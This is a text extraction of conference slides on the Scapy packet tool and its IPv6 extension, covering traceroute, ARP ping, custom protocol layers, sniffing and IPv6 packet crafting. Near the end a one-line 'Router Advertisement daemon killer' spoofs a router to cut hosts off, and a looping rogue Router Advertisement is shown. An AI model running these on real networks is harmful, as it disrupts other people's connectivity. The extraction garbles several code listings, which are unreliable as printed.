1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 49/100
![Page 108: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/108.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 109: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/109.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 110: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/110.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>> ans[0][1]
< IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options=’’ |< ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |< IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options=’’ |< TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 111: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/111.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
17.112.152.32:tcp80 198.133.219.25:tcp80 207.46.19.30:tcp80
1 172.16.15.254 11 172.16.15.254 11 172.16.15.254 11
2 172.16.16.1 11 172.16.16.1 11 172.16.16.1 11
[...]
11 212.187.128.57 11 212.187.128.57 11 212.187.128.46 11
12 4.68.128.106 11 4.68.128.106 11 4.68.128.102 11
13 4.68.97.5 11 64.159.1.130 11 209.247.10.133 11
14 4.68.127.6 11 4.68.123.73 11 209.247.9.50 11
15 12.122.80.22 11 4.0.26.14 11 63.211.220.82 11
16 12.122.10.2 11 128.107.239.53 11 207.46.40.129 11
17 12.122.10.6 11 128.107.224.69 11 207.46.35.150 11
18 12.122.2.245 11 198.133.219.25 SA 207.46.37.26 11
19 12.124.34.38 11 198.133.219.25 SA 64.4.63.70 11
20 17.112.8.11 11 198.133.219.25 SA 64.4.62.130 11
21 17.112.152.32 SA 198.133.219.25 SA 207.46.19.30 SA
[...]
>>> ans[0][1]
< IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options=’’ |< ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |< IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options=’’ |< TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>> ans[57][1].summary()
’Ether / IP / TCP 198.133.219.25:80 > 172.16.15.101:34711 SA / Padding’
P. Biondi / A. Ebalard Scapy and IPv6 networking 50/100
![Page 112: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/112.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
>>> ans.graph()
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 113: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/113.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
>>> ans.graph()
7018[ATT-INTERNET4 - AT&T WorldNet]
8075[MICROSOFT-CORP---MSN-AS-BLOCK]
12076[HOTMAIL-AS - Hotmail Corporati]
109[CISCO-EU-109 Cisco Systems Glo]
3356[LEVEL3 Level 3 Communications]
714[APPLE-ENGINEERING - Apple Comp]
12.122.10.2
12.122.10.6
12.122.80.22
12.124.34.38
17.112.8.11
12.122.2.245
207.46.40.129
207.46.35.150
207.46.37.26
64.4.63.70
64.4.62.130
207.46.19.30 80: SA
128.107.224.69
198.133.219.25 80: SA
128.107.239.53
63.211.220.82
209.247.9.50
212.187.128.57
4.68.128.106
4.0.26.14
64.159.1.130
4.68.123.73
4.68.128.102
209.247.10.133 4.68.97.5
212.187.128.46
4.68.127.6
17.112.152.32 80: SA
172.16.15.254
172.16.16.1
[...]
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 114: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/114.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, AS clustering
12076[HOTMAIL-AS - Hotmail Corporati]
714[APPLE-ENGINEERING - Apple Comp]
12.122.10.2
12.122.10.6
12.124.34.38
17.112.8.11
12.122.2.245
207.46.40.129
207.46.35.150
207.46.37.26
64.4.63.70
64.4.62.130
207.46.19.30 80: SA
128.107.224.69
198.133.219.25 80: SA
128.107.239.53
17.112.152.32 80: SA
P. Biondi / A. Ebalard Scapy and IPv6 networking 51/100
![Page 115: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/115.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, 3D toy
>>> ans.trace3D()
P. Biondi / A. Ebalard Scapy and IPv6 networking 52/100
![Page 116: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/116.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsTraceroute graphing, 3D toy
>>> ans.trace3D()
P. Biondi / A. Ebalard Scapy and IPv6 networking 52/100
![Page 117: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/117.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
High-Level commandsARP ping
>>> arping("172.16.15.0/24")
Begin emission:
*Finished to send 256 packets.
*
Received 2 packets, got 2 answers, remaining 254 packets
00:12:3f:0a:84:5a 172.16.15.64
00:12:79:3d:a3:6a 172.16.15.254
(< ARPing: UDP:0 TCP:0 ICMP:0 Other:2>,
< Unanswered: UDP:0 TCP:0 ICMP:0 Other:254>)
P. Biondi / A. Ebalard Scapy and IPv6 networking 53/100
![Page 118: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/118.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 54/100
![Page 119: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/119.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Implementing a new protocol
Each layer is a subclass of Packet
Each layer is described by a list of fields
This description is sufficient for assembly and disassembly
Each field is an instance of a Field subclass
Each field has at least a name and a default value
Example
1 c l a s s Test ( Packet ) :2 name = "Test protocol"
3 f i e l d s d e s c = [4 ByteF i e l d ( "field1" , 1 ) ,5 XShor tF ie ld ( "field2" , 2 ) ,6 IntEnumFie ld ( "field3" , 3 , { 1 : "one" , 10 : "ten" } ) ,7 ]
P. Biondi / A. Ebalard Scapy and IPv6 networking 55/100
![Page 120: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/120.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Use Scapy in your own toolsExecutable interactive add-on
You can extend Scapy in a separate file and benefit from Scapyinteraction
Example
1 #! /usr/bin/env python
23 from scapy import ∗45 c l a s s Test ( Packet ) :6 name = "Test packet"
7 f i e l d s d e s c = [ Sho r tF i e l d ( "test1" , 1 ) ,8 Sho r tF i e l d ( "test2" , 2) ]9
10 def make test ( x , y ) :11 r e t u r n Ether ( )/ IP ( )/ Test ( t e s t 1=x , t e s t 2=y )1213 i n t e r a c t ( mydict=g l o b a l s ( ) , mybanner="Test add -on v3.14" )
P. Biondi / A. Ebalard Scapy and IPv6 networking 56/100
![Page 121: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/121.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Use Scapy in your own toolsExternal script
You can make your own autonomous Scapy scripts
Example
1 #! /usr/bin/env python
23 import s y s
4 i f l e n ( s y s . argv ) != 2 :5 p r i n t "Usage: arping <net >\n eg: arping 192.168.1.0/24"
6 s y s . e x i t (1 )78 from scapy import srp , Ether ,ARP, conf
9 conf . verb=010 ans , unans=s rp ( Ether ( dst="ff:ff:ff:ff:ff:ff" )11 /ARP( pdst=s y s . argv [ 1 ] ) ,12 t imeout=2)1314 f o r s , r i n ans :15 p r i n t r . s p r i n t f ( "%Ether.src% %ARP.psrc%" )
P. Biondi / A. Ebalard Scapy and IPv6 networking 57/100
![Page 122: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/122.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Continuous traffic monitoring
use sniff() and the prn paramter
the callback function will be applied to every packet
BPF filters will improve perfomances
store=0 prevents sniff() from storing every packets
Example
1 #! /usr/bin/env python
2 from scapy import ∗34 def a r p mon i t o r c a l l b a c k ( pkt ) :5 i f ARP in pkt and pkt [ARP ] . op i n ( 1 , 2 ) : #who -has or is -at
6 r e t u r n pkt . s p r i n t f ( "%ARP.hwsrc% %ARP.psrc%" )78 s n i f f ( prn=a rp mon i t o r c a l l b a ck , f i l t e r="arp" , s t o r e =0)
P. Biondi / A. Ebalard Scapy and IPv6 networking 58/100
![Page 123: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/123.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 59/100
![Page 124: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/124.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Structural differences with IPv4New header format
from 14 to 8 fields
E x t e n s i o n H e a d e r I n f o r m a t i o n
F l o w L a b e lV e r s i o n T r a f f i c C l a s sP a y l o a d L e n g t h N e x t H e a d e r H o p L i m i tS o u r c e I P v 6 A d d r e s sD e s t i n a t i o n I P v 6 A d d r e s s 4 0 o c t e t sN e x t H e a d e r T a i l l e v a r i a b l eP a y l o a d
2 04 88
81 61 2 8 81 2 8
3 2 b i t s
P. Biondi / A. Ebalard Scapy and IPv6 networking 60/100
![Page 125: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/125.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Structural differences with IPv4Chaining and extensions
Goodbye IP options, welcome IPv6 extensions!
F r a g m e n tH e a d e rI P v 6 T C PT C P D a t aN e x t h e a d e rI P v 6 I C M P v 6I C M P v 6N e x t h e a d e rI P v 6 E S PE S PN e x t h e a d e r U D PU D P D a t aN e x t h e a d e r
123 I P v 6 I C M P v 6I C M P v 6N e x t h e a d e rR o u t i n gH e a d e rR o u t i n gH e a d e rN e x t h e a d e r F r a g m e n tH e a d e rN e x t h e a d e rP. Biondi / A. Ebalard Scapy and IPv6 networking 61/100
![Page 126: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/126.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Functional differences with IPv4Forget all you knew for IPv4
Autoconfiguration Mechanisms
ARP has gone. Extended by Neighbor Discovery
Broadcast replaced by link-local scope multicast
End-to-End principle
Releasing core routers from intensive computation.
Fragmentation is performed by end nodesChecksum computation is performed by end nodes at L4IPv6 header fixed size simplifies handling (or not).
NAT makes no sense under IPv6 : no states =⇒ no SPoF.
P. Biondi / A. Ebalard Scapy and IPv6 networking 62/100
![Page 127: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/127.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 63/100
![Page 128: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/128.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportGeneralities
Works on Linux, FreeBSD, NetBSD and Mac OS X
Requires a recent version of Scapy
Provided under GNU GPLv2 License
Developed with Guillaume Valadon (Esaki Lab / LIP6)
Link : http://namabiiru.hongo.wide.ad.jp/scapy6
Remarks, bug reports and patches are welcome !!!
P. Biondi / A. Ebalard Scapy and IPv6 networking 64/100
![Page 129: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/129.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportIPv6 support : make it natural
s/IP/IPv6/g
$ sudo scapy6
Welcome to Scapy (1.0.4.84beta)
IPv6 enabled
>>> a=IPv6(dst="www.netbsd.org")/TCP(dport=[21,80])
>>> a
<IPv6 nh=TCP dst=2001:4f8:4:7:2e0:81ff:fe52:9a6b |<TCP dport=[21, 80] |>>
>>> send(a)
..
Sent 2 packets.
>>> a.dst="2001:6c8:6:4::7" # ftp.freebsd.org
>>> a[TCP].dport=21
>>> a
<IPv6 nh=TCP dst=2001:6c8:6:4::7 |<TCP dport=ftp |>>
>>> b=sr1(a, verbose=0)
>>> b.src
2001:6c8:6:4::7
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 65/100
![Page 130: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/130.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 support
Conversations>>> a=sniff(filter="ip6")
>>> a
<Sniffed: UDP:0 TCP:219 ICMP:0 Other:3>
>>> a.conversations(getsrcdst=lambda x:(x[IPv6].src, x[IPv6].dst), \type="png", target="> /tmp/conversations.png")
2001:db8:67df:1::2
2001:db8:67df:1:20e:1fff:feda:4660
ff02::1:ff00:2
2001:db8:67df:1::1
P. Biondi / A. Ebalard Scapy and IPv6 networking 66/100
![Page 131: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/131.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportIPv6 support : simplifying IPv6 packet crafting
Scapy6 spares you the need to care about :
L2 address resolution (ND support);
L2/L3 source/destination address selection;
Name to address translation (aka DNS resolution);
L4 checksum computation;
Default values filling (static/dynamic ones);
Hop Limit values in specific cases (ND);
Layer bindings (Next Header field filling);
. . .
⇒ You keep your mind focused on fields of interest !!
P. Biondi / A. Ebalard Scapy and IPv6 networking 67/100
![Page 132: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/132.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportA simple example
The one line Router Advertisement daemon
>>> sendp(Ether()/IPv6()/ICMPv6ND_RA()/ \ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", \
prefixlen=64)/ \ICMPv6NDOptSrcLLAddr(lladdr="00:b0:b0:67:89:AB"), \loop=1, inter=3)
What Scapy6 did for you today :
You provided the 3 most important values (prefix, prefixlength and router Link layer Address).
Scapy6 filled addresses, Hop Limit, Next Header, Flags,checksum, length fields in a consistent way.
P. Biondi / A. Ebalard Scapy and IPv6 networking 68/100
![Page 133: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/133.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
What’s your name ?
>>> someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
>>> for addr in someaddr:
... a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
... print a.sprintf( "%-35s,src%: %data%")
...
2001:6c8:6:4::7 : [’ftp.beastie.tdk.net.’]
2001:500::1035 : [’pao1b.f.root-servers.org.’]
2001:1ba0:0:4::1 : [’rimfall.dialtelecom.sk.’]
2001:2f0:104:1:2e0:18ff:fea8:16f5 : [’updraft3.jp.freebsd.org.’]
2001:e40:100:207::2 : [’ring.sakura.ad.jp.’]
2001:7f8:2:1::18 : [’z2.internal.securanetworks.net.’]
2001:4f8:0:2::e : [’sf1.isc.org.’]
2001:4f8:0:2::d : [’webster.isc.org.’]
P. Biondi / A. Ebalard Scapy and IPv6 networking 69/100
![Page 134: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/134.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
fe80::20a:5eff:fe00:1349 : [’assam.ipv6.test.lab.’]
fe80::20a:4aff:fe3d:4c27 : [’lotus.ipv6.test.lab.’]
fe80::20a:6cff:fe27:1c49 : [’yunnan.ipv6.test.lab.’]
fe80::20a:5bff:fe20:1d5a : [’darjeeling.ipv6.test.lab.’]
The one line Router Advertisement daemon killer>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 70/100
![Page 135: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/135.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
